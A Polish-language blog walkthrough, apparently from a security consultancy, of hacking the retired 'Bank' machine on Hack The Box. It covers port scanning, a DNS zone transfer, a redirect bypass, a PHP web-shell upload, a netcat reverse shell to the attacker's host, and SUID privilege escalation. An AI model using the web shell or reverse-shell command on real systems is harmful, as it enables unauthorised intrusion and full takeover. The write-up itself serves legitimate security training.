Zobacz, jak włamałem się do Banku! (od HTB)

Testy penetracyjne pozwalają wcielić się w rolę hakera, aby sprawdzić zabezpieczenia systemów. Dziś pokażę, jak włamałem się do maszyny „Bank” na platformie Hack The Box (HTB).

Czym jest Hack The Box?

Hack The Box to platforma umożliwiająca naukę cyberbezpieczeństwa. Udostępnia maszyny symulujące rzeczywiste systemy, na których można testować swoje umiejętności. Maszyny podzielone są na dwie kategorie:

  1. Aktywne, których rozwiązania muszą pozostać tajemnicą.
  2. Retired, czyli te, które można publicznie analizować i publikować walkthrough.

Dziś skupimy się na maszynie „Bank” z kategorii retired. To idealny przykład dla początkujących, aby nauczyć się testów penetracyjnych.

konsultacje

Wzmocnij cyberbezpieczeństwo
swojej firmy już dziś!

Zapisz się na 30-minutową darmową konsultację, aby wstępnie omówić potrzeby związane z cyberbezpieczeństwem w Twojej firmie.
Wspólnie znajdziemy rozwiązanie dopasowane do specyfiki Twojej działalności!

Przygotowanie narzędzi

Do pracy potrzebujesz systemu operacyjnego dedykowanego testom penetracyjnym, np. Kali Linux

Rekomendowane narzędzia:

  • Nmap do skanowania portów,
  • Burp Suite do analizy żądań HTTP,
  • Feroxbuster do enumeracji zasobów.

Pierwszy krok to połączenie się z siecią VPN HTB. Pobieramy plik konfiguracji OpenVPN i uruchamiamy połączenie. Następnie upewniamy się, że maszyna „Bank” odpowiada, pingując jej adres IP.

Rozpoznanie maszyny

Przeprowadzamy rekonesans, zaczynając od skanowania portów za pomocą Nmap:

nmap -p- -v 10.129.29.200

Znalezione porty to:

  • 22 – SSH,
  • 53 – serwer DNS (Bind),
  • 80 – HTTP.

Dodatkowe skanowanie (-sC -sV) ujawnia, że maszyna działa na systemie Ubuntu Linux. Port 53 wskazuje na potencjalną podatność związaną z Zone Transfer.

Zone Transfer i konfiguracja domen

Zone Transfer pozwala podejrzeć konfigurację DNS. Używamy:

dig axfr @10.129.29.200 bank.htb

Efekt? Otrzymujemy listę domen powiązanych z maszyną:

  • bank.htb
  • ns.bank.htb
  • www.bank.htb.

Dodajemy te wpisy do pliku /etc/hosts, aby móc je przeglądać:

10.129.29.200 bank.htb ns.bank.htb www.bank.htb

Odkrywanie zasobów HTTP

Korzystamy z Feroxbuster w celu zidentyfikowania ukrytych ścieżek:

feroxbuster -u http://bank.htb -x php

Znajdujemy interesujące zasoby, m.in. support.php. Problem? Jest chroniony i wymaga autoryzacji.

Eksploatacja poprzez Burp Suite

Burp Suite pozwala analizować i modyfikować żądania HTTP. Zmieniamy odpowiedź serwera z przekierowania (302) na status „200 OK”. Dzięki temu możemy uzyskać dostęp do ukrytej zawartości serwisu.

Wgrywanie plików i wykonanie kodu

Na stronie support.php mamy możliwość wgrywania plików. Wykorzystujemy to, aby załadować plik PHP z opcją wykonania komend:

<?php echo system($_REQUEST[’cmd’]); ?>

Po wgraniu pliku wywołamy komendy, dodając parametry w adresie URL:

http://bank.htb/uploads/cmd.php?cmd=ls

konsultacje z cyberguru

Gotowy na wzmocnienie cyberbezpieczeństwa swojej firmy?

Zarezerwuj darmową 30-minutową konsultację, aby omówić potrzeby Twojej firmy w zakresie ochrony danych i cyberbezpieczeństwa. Wspólnie zidentyfikujemy zagrożenia i znajdziemy najlepsze rozwiązania dopasowane do Twojego biznesu.

Porozmawiajmy! Kliknij w poniższy przycisk i umów się na bezpłatną konsultację.

Reverse Shell

Aby uzyskać interaktywny dostęp do maszyny, konfigurujemy Reverse Shell:

  1. Na swojej maszynie uruchamiamy nasłuch:
    nc -lvnp 4444
  2. W przeglądarce wykonujemy komendę, aby połączyć się z naszym serwerem:
    http://bank.htb/uploads/cmd.php?cmd=nc 10.10.14.153 4444 -e /bin/bash

Po nawiązaniu połączenia jesteśmy użytkownikiem systemu.

Podniesienie uprawnień (Privilege Escalation)

Na maszynie wyszukujemy pliki z nietypowymi uprawnieniami:

find / -perm -4000 2>/dev/null

Znaleziony plik /htb/bin/emergency umożliwia eskalację uprawnień. Po jego uruchomieniu stajemy się użytkownikiem root:

/htb/bin/emergency

Zdobycie flag

Każda maszyna HTB zawiera dwie flagi:

  1. User Flag – w katalogu użytkownika:
    bash
    cat /home/user/user.txt
  2. Root Flag – w katalogu root:
    cat /root/root.txt

Wklejamy je na stronie HTB, aby potwierdzić ukończenie zadania.

Wnioski

Testy penetracyjne są niezwykle cenne pod kątem nauki cyberbezpieczeństwa. To proces wymagający cierpliwości, precyzji i ciągłego uczenia się. Pamiętaj jednak, że hakowanie jest legalne tylko w odpowiednich środowiskach testowych lub za zgodą właściciela systemu.

współpraca

Szukasz stałej, kompleksowej obsługi bezpieczeństwa IT Twojej firmy?

Współpracuj ze mną w modelu CISO as a Service
Zostanę zewnętrznym szefem cyberbezpieczeństwa Twojej firmy

CISO as a Service od Cyberguru to: